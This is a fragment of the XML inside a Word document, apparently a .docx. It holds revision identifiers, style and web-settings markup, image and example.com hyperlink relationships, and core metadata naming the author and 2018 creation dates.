    <w:rsid w:val="007437BF"/>
    <w:rsid w:val="00770264"/>
    <w:rsid w:val="007830CC"/>
    <w:rsid w:val="00791B43"/>
    <w:rsid w:val="007D086B"/>
    <w:rsid w:val="007D5AC5"/>
    <w:rsid w:val="00812276"/>
    <w:rsid w:val="00815907"/>
    <w:rsid w:val="00833B8B"/>
    <w:rsid w:val="0084049D"/>
    <w:rsid w:val="00845960"/>
    <w:rsid w:val="00856B0B"/>
    <w:rsid w:val="00856C8A"/>
    <w:rsid w:val="008570C8"/>
    <w:rsid w:val="00871E60"/>
    <w:rsid w:val="00872C51"/>
    <w:rsid w:val="008848E5"/>
    <w:rsid w:val="008A0CB8"/>
    <w:rsid w:val="008A109A"/>
    <w:rsid w:val="008A21E2"/>
    <w:rsid w:val="008A2355"/>
    <w:rsid w:val="008A3639"/>
    <w:rsid w:val="008C6833"/>
    <w:rsid w:val="008D36C6"/>
    <w:rsid w:val="0090076F"/>
    <w:rsid w:val="00910552"/>
    <w:rsid w:val="009138C1"/>
    <w:rsid w:val="00920B57"/>
    <w:rsid w:val="009236CF"/>
    <w:rsid w:val="00935BD6"/>
    <w:rsid w:val="00936090"/>
    <w:rsid w:val="009401C6"/>
    <w:rsid w:val="00945818"/>
    <w:rsid w:val="00960150"/>
    <w:rsid w:val="00997DC4"/>
    <w:rsid w:val="009A006B"/>
    <w:rsid w:val="009A4744"/>
    <w:rsid w:val="009B3EA7"/>
    <w:rsid w:val="009F6F74"/>
    <w:rsid w:val="00A46B5C"/>
    <w:rsid w:val="00A6359E"/>
    <w:rsid w:val="00A82D2F"/>
    <w:rsid w:val="00AA2AA4"/>
    <w:rsid w:val="00AB1B61"/>
    <w:rsid w:val="00AB367B"/>
    <w:rsid w:val="00AC4113"/>
    <w:rsid w:val="00AD012E"/>
    <w:rsid w:val="00AD25D1"/>
    <w:rsid w:val="00AD3A86"/>
    <w:rsid w:val="00B24DD4"/>
    <w:rsid w:val="00B41120"/>
    <w:rsid w:val="00B61AEB"/>
    <w:rsid w:val="00B96DEF"/>
    <w:rsid w:val="00BA09EA"/>
    <w:rsid w:val="00BA5E8E"/>
    <w:rsid w:val="00BC345B"/>
    <w:rsid w:val="00BC5157"/>
    <w:rsid w:val="00BC6021"/>
    <w:rsid w:val="00C03275"/>
    <w:rsid w:val="00C04AC6"/>
    <w:rsid w:val="00C216DB"/>
    <w:rsid w:val="00C2554B"/>
    <w:rsid w:val="00C34C9B"/>
    <w:rsid w:val="00C36411"/>
    <w:rsid w:val="00C37B81"/>
    <w:rsid w:val="00C37D69"/>
    <w:rsid w:val="00C477EB"/>
    <w:rsid w:val="00C71B8E"/>
    <w:rsid w:val="00CA0076"/>
    <w:rsid w:val="00CA4657"/>
    <w:rsid w:val="00CB07DA"/>
    <w:rsid w:val="00CD134A"/>
    <w:rsid w:val="00CD70CB"/>
    <w:rsid w:val="00CD7FE2"/>
    <w:rsid w:val="00CE029F"/>
    <w:rsid w:val="00CF01D6"/>
    <w:rsid w:val="00D1727E"/>
    <w:rsid w:val="00D37452"/>
    <w:rsid w:val="00D4185F"/>
    <w:rsid w:val="00D83556"/>
    <w:rsid w:val="00DA7898"/>
    <w:rsid w:val="00DD3DA8"/>
    <w:rsid w:val="00DE5178"/>
    <w:rsid w:val="00E034BC"/>
    <w:rsid w:val="00E139E1"/>
    <w:rsid w:val="00E409A6"/>
    <w:rsid w:val="00E42D92"/>
    <w:rsid w:val="00E54C09"/>
    <w:rsid w:val="00E72E10"/>
    <w:rsid w:val="00E91C8C"/>
    <w:rsid w:val="00EB26D3"/>
    <w:rsid w:val="00EE2FD2"/>
    <w:rsid w:val="00EF6991"/>
    <w:rsid w:val="00F03235"/>
    <w:rsid w:val="00F07B02"/>
    <w:rsid w:val="00F32B2D"/>
    <w:rsid w:val="00F5607B"/>
    <w:rsid w:val="00F8655E"/>
    <w:rsid w:val="00FB0E78"/>
    <w:rsid w:val="00FB3306"/>
    <w:rsid w:val="00FB7BF2"/>
    <w:rsid w:val="00FD7EB7"/>
    <w:rsid w:val="00FE4362"/>
    <w:rsid w:val="00FF6F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50350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062EC"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00997DC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945084">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="272980829">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="388574641">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="500657059">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="570971007">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="729692423">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1149592443">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1196384059">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1231427998">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1311709012">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1519781447">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1768580840">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1786268942">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1850560362">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1914467398">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1974096274">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2004581894">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="205823655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ww.example.com" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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www.example.com's" TargetMode="External"/><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www.example.com" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.examp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24</Pages>
  <Words>4421</Words>
  <Characters>25203</Characters>
  <Application>Microsoft Macintosh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Jashwanth Reddy Gangula</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jashwanth Reddy Gangula</cp:lastModifiedBy>
  <cp:revision>535</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-20T21:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-21T18:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>